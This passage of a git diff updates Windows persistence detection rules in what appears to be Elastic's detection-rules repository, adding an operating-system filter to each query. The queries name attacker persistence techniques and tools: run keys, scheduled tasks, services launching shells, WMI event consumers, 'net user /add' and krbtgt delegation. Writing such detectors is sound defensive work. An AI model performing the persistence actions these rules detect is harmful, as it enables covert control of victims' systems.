file.extension : ("wll","xll","ppa","ppam","xla","xlam") and file.path : ( diff --git a/rules/windows/persistence_ms_outlook_vba_template.toml b/rules/windows/persistence_ms_outlook_vba_template.toml index 2fa240431..4714f1593 100644 --- a/rules/windows/persistence_ms_outlook_vba_template.toml +++ b/rules/windows/persistence_ms_outlook_vba_template.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and file.path : "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM" ''' diff --git a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml index 686ef9119..860c88a99 100644 --- a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml +++ b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -45,7 +45,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:modified-user-account and event.code:4738 and winlog.event_data.AllowedToDelegateTo:*krbtgt* +event.action:modified-user-account and host.os.type:windows and event.code:4738 and + winlog.event_data.AllowedToDelegateTo:*krbtgt* ''' diff --git a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml index 63fc87dce..17f02f59c 100644 --- a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml +++ b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name: ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and process.args : "Set-CASMailbox*ActiveSyncAllowedDeviceIDs*" ''' diff --git a/rules/windows/persistence_powersshell_profiles.toml b/rules/windows/persistence_powersshell_profiles.toml index eab9abbac..55125a8ab 100644 --- a/rules/windows/persistence_powersshell_profiles.toml +++ b/rules/windows/persistence_powersshell_profiles.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and file.path : ("?:\\Users\\*\\Documents\\WindowsPowerShell\\*", "?:\\Users\\*\\Documents\\PowerShell\\*", "?:\\Windows\\System32\\WindowsPowerShell\\*") and diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml index ecfbd4fbd..aedc038be 100644 --- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml +++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -86,7 +86,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : ("Utilman.exe", "winlogon.exe") and user.name == "SYSTEM" and process.args : ( diff --git a/rules/windows/persistence_registry_uncommon.toml b/rules/windows/persistence_registry_uncommon.toml index a6e8c2848..704561ff4 100644 --- a/rules/windows/persistence_registry_uncommon.toml +++ b/rules/windows/persistence_registry_uncommon.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and /* uncomment once stable length(registry.data.strings) > 0 and */ registry.path : ( "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Terminal Server\\Install\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\*", diff --git a/rules/windows/persistence_remote_password_reset.toml b/rules/windows/persistence_remote_password_reset.toml index f729c5ac6..2ae771320 100644 --- a/rules/windows/persistence_remote_password_reset.toml +++ b/rules/windows/persistence_remote_password_reset.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,12 +32,12 @@ type = "eql" query = ''' sequence by winlog.computer_name with maxspan=5m - [authentication where event.action == "logged-in" and + [authentication where host.os.type == "windows" and event.action == "logged-in" and /* event 4624 need to be logged */ winlog.logon.type : "Network" and event.outcome == "success" and source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1"] by winlog.event_data.TargetLogonId /* event 4724 need to be logged */ - [iam where event.action == "reset-password" and + [iam where host.os.type == "windows" and event.action == "reset-password" and ( /* This rule is very noisy if not scoped to privileged accounts, duplicate the diff --git a/rules/windows/persistence_run_key_and_startup_broad.toml b/rules/windows/persistence_run_key_and_startup_broad.toml index 8791a20c9..0f95bb1a1 100644 --- a/rules/windows/persistence_run_key_and_startup_broad.toml +++ b/rules/windows/persistence_run_key_and_startup_broad.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -84,7 +84,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.data.strings != null and +registry where host.os.type == "windows" and registry.data.strings != null and registry.path : ( /* Machine Hive */ "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", diff --git a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml index 1852a0066..2fd316ca4 100644 --- a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml +++ b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,9 +26,9 @@ type = "eql" query = ''' /* userinit followed by explorer followed by early child process of explorer (unlikely to be launched interactively) within 1m */ sequence by host.id, user.name with maxspan=1m - [process where event.type == "start" and process.name : "userinit.exe" and process.parent.name : "winlogon.exe"] - [process where event.type == "start" and process.name : "explorer.exe"] - [process where event.type == "start" and process.parent.name : "explorer.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "userinit.exe" and process.parent.name : "winlogon.exe"] + [process where host.os.type == "windows" and event.type == "start" and process.name : "explorer.exe"] + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "explorer.exe" and /* add suspicious programs here */ process.pe.original_file_name in ("cscript.exe", "wscript.exe", diff --git a/rules/windows/persistence_scheduled_task_creation_winlog.toml b/rules/windows/persistence_scheduled_task_creation_winlog.toml index ff0e183f9..6e8339161 100644 --- a/rules/windows/persistence_scheduled_task_creation_winlog.toml +++ b/rules/windows/persistence_scheduled_task_creation_winlog.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -iam where event.action == "scheduled-task-created" and +iam where host.os.type == "windows" and event.action == "scheduled-task-created" and /* excluding tasks created by the computer account */ not user.name : "*$" and diff --git a/rules/windows/persistence_scheduled_task_updated.toml b/rules/windows/persistence_scheduled_task_updated.toml index e7b247eac..8f61fcdfd 100644 --- a/rules/windows/persistence_scheduled_task_updated.toml +++ b/rules/windows/persistence_scheduled_task_updated.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -iam where event.action == "scheduled-task-updated" and +iam where host.os.type == "windows" and event.action == "scheduled-task-updated" and /* excluding tasks created by the computer account */ not user.name : "*$" and diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml index 57c6db82c..b9e348a8a 100644 --- a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml +++ b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -96,7 +96,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where event.action == "Directory Service Changes" and +any where host.os.type == "windows" and event.action == "Directory Service Changes" and event.code == "5136" and winlog.event_data.AttributeLDAPDisplayName : "dSHeuristics" and length(winlog.event_data.AttributeValue) > 15 and diff --git a/rules/windows/persistence_service_dll_unsigned.toml b/rules/windows/persistence_service_dll_unsigned.toml index 59d94515f..1b72dd9e1 100644 --- a/rules/windows/persistence_service_dll_unsigned.toml +++ b/rules/windows/persistence_service_dll_unsigned.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: dll.Ext.relative_file_creation_time is populated in Elastic Endpoint 8.4 and above." min_stack_version = "8.4.0" -updated_date = "2023/01/17" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -library where +library where host.os.type == "windows" and process.executable : ("?:\\Windows\\System32\\svchost.exe", "?:\\Windows\\Syswow64\\svchost.exe") and diff --git a/rules/windows/persistence_service_windows_service_winlog.toml b/rules/windows/persistence_service_windows_service_winlog.toml index 934ed8f19..15e6625b3 100644 --- a/rules/windows/persistence_service_windows_service_winlog.toml +++ b/rules/windows/persistence_service_windows_service_winlog.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -55,7 +55,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where +any where host.os.type == "windows" and (event.code : "4697" and (winlog.event_data.ServiceFileName : ("*COMSPEC*", "*\\172.0.0.1*", "*Admin$*", "*powershell*", "*rundll32*", "*cmd.exe*", "*PSEXESVC*", diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/persistence_services_registry.toml index b18ef8566..c6a37735a 100644 --- a/rules/windows/persistence_services_registry.toml +++ b/rules/windows/persistence_services_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : ("HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL", "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath") and +registry where host.os.type == "windows" and registry.path : ("HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL", "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath") and not registry.data.strings : ("?:\\windows\\system32\\Drivers\\*.sys", "\\SystemRoot\\System32\\drivers\\*.sys", "\\??\\?:\\Windows\\system32\\Drivers\\*.SYS", diff --git a/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml b/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml index 4adfc248f..a9a30c0db 100644 --- a/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml +++ b/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -86,7 +86,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and user.domain != "NT AUTHORITY" and file.path : ("C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*") and diff --git a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml index 302a8cf01..d9702827d 100644 --- a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml +++ b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -81,7 +81,7 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=5s - [process where event.type == "start" and process.code_signature.trusted == false and + [process where host.os.type == "windows" and event.type == "start" and process.code_signature.trusted == false and /* suspicious paths can be added here */ process.executable : ("C:\\Users\\*.exe", "C:\\ProgramData\\*.exe", @@ -90,7 +90,7 @@ sequence by host.id, process.entity_id with maxspan=5s "C:\\Intel\\*.exe", "C:\\PerfLogs\\*.exe") ] - [file where event.type != "deletion" and user.domain != "NT AUTHORITY" and + [file where host.os.type == "windows" and event.type != "deletion" and user.domain != "NT AUTHORITY" and file.path : ("C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*") ] diff --git a/rules/windows/persistence_startup_folder_scripts.toml b/rules/windows/persistence_startup_folder_scripts.toml index 2575256f1..06ef11c8f 100644 --- a/rules/windows/persistence_startup_folder_scripts.toml +++ b/rules/windows/persistence_startup_folder_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -85,7 +85,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and user.domain != "NT AUTHORITY" and +file where host.os.type == "windows" and event.type != "deletion" and user.domain != "NT AUTHORITY" and /* detect shortcuts created by wscript.exe or cscript.exe */ (file.path : "C:\\*\\Programs\\Startup\\*.lnk" and diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml index ee10d0e29..cae0a4774 100644 --- a/rules/windows/persistence_suspicious_com_hijack_registry.toml +++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -74,7 +74,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and /* not necessary but good for filtering privileged installations */ user.domain != "NT AUTHORITY" and diff --git a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml index a0ebcfe97..2f6a87f47 100644 --- a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml +++ b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -35,7 +35,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where +any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSPUB.EXE", "MSACCESS.EXE") and (dll.name : "taskschd.dll" or file.name : "taskschd.dll") diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index 0957a14d7..91e748260 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and /* Schedule service cmdline on Win10+ */ process.parent.name : "svchost.exe" and process.parent.args : "Schedule" and /* add suspicious programs here */ diff --git a/rules/windows/persistence_suspicious_service_created_registry.toml b/rules/windows/persistence_suspicious_service_created_registry.toml index e7d2b5e88..cacbfc95b 100644 --- a/rules/windows/persistence_suspicious_service_created_registry.toml +++ b/rules/windows/persistence_suspicious_service_created_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath" and +registry where host.os.type == "windows" and registry.path : "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath" and /* add suspicious registry ImagePath values here */ registry.data.strings : ("%COMSPEC%*", "*\\.\\pipe\\*") ''' diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml index 50d740848..dff616c8d 100644 --- a/rules/windows/persistence_system_shells_via_services.toml +++ b/rules/windows/persistence_system_shells_via_services.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -61,7 +61,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "services.exe" and process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") and diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index fa1ce3ad3..630f039e7 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,8 +27,8 @@ type = "eql" query = ''' sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m - [iam where event.action == "scheduled-task-created" and not user.name : "*$"] - [iam where event.action == "scheduled-task-deleted" and not user.name : "*$"] + [iam where host.os.type == "windows" and event.action == "scheduled-task-created" and not user.name : "*$"] + [iam where host.os.type == "windows" and event.action == "scheduled-task-deleted" and not user.name : "*$"] ''' [[rule.threat]] diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index 672b5f69a..2f0978cd3 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type:"change" and +registry where host.os.type == "windows" and event.type:"change" and registry.path:"HKLM\\SYSTEM\\*ControlSet*\\Services\\W32Time\\TimeProviders\\*" and registry.data.strings:"*.dll" ''' diff --git a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml index 805b4dab5..ea51372ee 100644 --- a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml +++ b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Skoetting"] @@ -62,7 +62,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -iam where event.action == "added-member-to-group" and +iam where host.os.type == "windows" and event.action == "added-member-to-group" and group.name : ("Admin*", "Local Administrators", "Domain Admins", diff --git a/rules/windows/persistence_user_account_creation.toml b/rules/windows/persistence_user_account_creation.toml index 5609f8f65..a397bf048 100644 --- a/rules/windows/persistence_user_account_creation.toml +++ b/rules/windows/persistence_user_account_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -62,7 +62,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("net.exe", "net1.exe") and not process.parent.name : "net.exe" and (process.args : "user" and process.args : ("/ad", "/add")) diff --git a/rules/windows/persistence_user_account_creation_event_logs.toml b/rules/windows/persistence_user_account_creation_event_logs.toml index 796dfc597..89069980f 100644 --- a/rules/windows/persistence_user_account_creation_event_logs.toml +++ b/rules/windows/persistence_user_account_creation_event_logs.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/04" integration = ["system", "windows"] maturity = "development" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Skoetting"] @@ -29,7 +29,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.module : ("system" or "security") and (event.code : "4720" or event.action : "added-user-account") +event.module:("system" or "security") and host.os.type:windows and + (event.code:"4720" or event.action:"added-user-account") ''' diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 453407281..77def2fd9 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.name : "sdbinst.exe" and +process where host.os.type == "windows" and event.type == "start" and process.name : "sdbinst.exe" and not (process.args : "-m" and process.args : "-bg") and not process.args : "-mm" ''' diff --git a/rules/windows/persistence_via_bits_job_notify_command.toml b/rules/windows/persistence_via_bits_job_notify_command.toml index 82c913059..316e5377a 100644 --- a/rules/windows/persistence_via_bits_job_notify_command.toml +++ b/rules/windows/persistence_via_bits_job_notify_command.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -36,7 +36,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "svchost.exe" and process.parent.args : "BITS" and not process.executable : ("?:\\Windows\\System32\\WerFaultSecure.exe", diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml index 06fa08b61..162a72863 100644 --- a/rules/windows/persistence_via_hidden_run_key_valuename.toml +++ b/rules/windows/persistence_via_hidden_run_key_valuename.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ type = "eql" query = ''' /* Registry Path ends with backslash */ -registry where /* length(registry.data.strings) > 0 and */ +registry where host.os.type == "windows" and /* length(registry.data.strings) > 0 and */ registry.path : ("HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKU\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", diff --git a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml index bfc21218c..1d09a6c43 100644 --- a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml +++ b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.path : ("HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\Security Packages*", "HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\OSConfig\\Security Packages*") and not process.executable : ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe") diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index d52a219c5..1c9fce60c 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "CompatTelRunner.exe" and process.args : "-cv*" and not process.name : ("conhost.exe", "DeviceCensus.exe", diff --git a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml index a7585c28b..4b5b7b8f7 100644 --- a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml +++ b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -82,7 +82,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.executable : "C:\\Windows\\System32\\svchost.exe" and process.parent.args : "UsoSvc" and not process.executable : diff --git a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml index 2f142104f..f17492457 100644 --- a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml +++ b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "wmic.exe" or process.pe.original_file_name == "wmic.exe") and process.args : "create" and process.args : ("ActiveScriptEventConsumer", 